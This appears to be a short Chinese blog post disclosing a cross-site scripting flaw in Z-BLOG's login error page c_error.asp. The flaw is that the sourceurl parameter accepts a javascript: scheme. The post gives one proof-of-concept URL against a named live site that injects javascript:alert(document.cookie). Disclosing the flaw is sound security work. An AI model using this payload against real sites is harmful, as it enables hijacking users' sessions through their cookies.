Z-BLOG XSS Vulnerabilities

发表评论 (0) 查看评论

漏洞描述:
Z-BLOG后台登陆错误信息显示文件c_error.asp,虽然对跳转URL的参数sourceurl进行了编码,但没有判断链接头部,执行了javascript伪协议,造成跨站脚本漏洞。
漏洞测试:

http://www.woyigui.cn/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie)
发表评论?

0 条评论。

发表评论